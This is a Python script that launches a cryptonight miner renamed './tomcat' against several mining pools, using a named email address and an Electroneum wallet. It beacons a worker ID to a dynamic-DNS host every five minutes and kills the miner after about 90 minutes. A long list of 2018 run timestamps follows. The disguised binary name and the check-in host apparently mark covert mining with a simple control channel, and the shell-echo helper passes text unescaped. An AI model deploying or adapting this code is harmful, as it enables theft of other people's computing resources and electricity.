import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:06.972093
#2018-02-17 16:10:08.613552
#2018-02-17 17:59:03.600471
#2018-02-17 19:47:04.797978
#2018-02-17 21:34:01.568685
#2018-02-17 23:18:05.354478
#2018-02-18 01:06:02.195245
#2018-02-18 02:53:07.156612
#2018-02-18 04:42:07.597962
#2018-02-18 06:34:01.608446
#2018-02-18 08:22:06.267920
#2018-02-18 10:10:07.549127
#2018-02-18 11:56:06.088744
#2018-02-18 13:41:06.104009
#2018-02-18 15:32:05.616989
#2018-02-18 17:20:01.987772
#2018-02-18 19:08:07.455685
#2018-02-18 20:54:05.289241
#2018-02-18 22:39:05.044744
#2018-02-19 00:28:02.170456
#2018-02-19 02:13:02.228872
#2018-02-19 04:01:02.099866
#2018-02-19 05:45:07.669238
#2018-02-19 07:32:04.620830
#2018-02-19 09:23:01.500172
#2018-02-19 11:12:09.015326
#2018-02-19 12:59:08.437372
#2018-02-19 14:46:12.170786
#2018-02-19 16:35:09.836741
#2018-02-19 18:23:01.366928
#2018-02-19 20:09:08.068405
#2018-02-19 21:59:01.287451
#2018-02-19 23:43:08.950753
#2018-02-20 01:32:05.583950
#2018-02-20 03:20:06.074273
#2018-02-20 05:07:03.772768
#2018-02-20 06:50:08.523184
#2018-02-20 08:36:08.117966
#2018-02-20 10:22:04.013469
#2018-02-20 12:06:01.541332
#2018-02-20 13:54:07.301396
#2018-02-20 15:39:09.436305
#2018-02-20 17:23:06.665857
#2018-02-20 19:13:04.663564
#2018-02-20 21:02:03.873555
#2018-02-20 22:48:06.971531
#2018-02-21 00:32:01.625680
#2018-02-21 02:17:04.877474
#2018-02-21 04:04:01.380769
#2018-02-21 05:50:09.082211
#2018-02-21 07:38:03.496249
#2018-02-21 09:23:02.138837
#2018-02-21 11:11:05.030877
#2018-02-21 12:58:01.559597
#2018-02-21 14:45:09.197255
#2018-02-21 16:32:09.046030
#2018-02-21 18:21:08.357263
#2018-02-21 20:08:05.040282
#2018-02-21 21:56:08.518705
#2018-02-21 23:43:06.375815
#2018-02-22 01:32:04.729928
#2018-02-22 03:19:05.638052
#2018-02-22 05:06:01.501043
#2018-02-22 06:48:07.886042
#2018-02-22 08:38:04.255279
#2018-02-22 10:24:09.366148
#2018-02-22 12:10:08.297425
#2018-02-22 13:55:09.141703
#2018-02-22 15:42:09.159492
#2018-02-22 17:27:03.475819
#2018-02-22 19:14:06.120341
#2018-02-22 21:06:01.542486
#2018-02-22 22:50:02.158160
#2018-02-23 00:37:01.378667
#2018-02-23 02:23:04.215070
#2018-02-23 04:13:01.640865
#2018-02-23 05:57:07.104721
#2018-02-23 07:44:04.293279
#2018-02-23 09:51:01.549889
#2018-02-23 11:58:05.535705
#2018-02-23 13:47:01.938475
#2018-02-23 15:36:02.196035
#2018-02-23 17:24:07.265546
#2018-02-23 19:11:03.959546
#2018-02-23 20:55:01.668016
#2018-02-23 22:42:08.056317
#2018-02-24 00:29:06.227914
#2018-02-24 02:19:05.411161
#2018-02-24 04:10:07.980616
#2018-02-24 05:58:01.507710
#2018-02-24 07:45:04.319698
#2018-02-24 09:32:04.244018
#2018-02-24 11:25:08.617248
#2018-02-24 13:14:07.184590
#2018-02-24 15:04:03.612332
#2018-02-24 16:53:06.119806
#2018-02-24 18:41:06.905204
#2018-02-24 20:32:05.053438
#2018-02-24 22:33:04.692028
#2018-02-25 02:51:06.231641
#2018-02-25 06:27:04.944719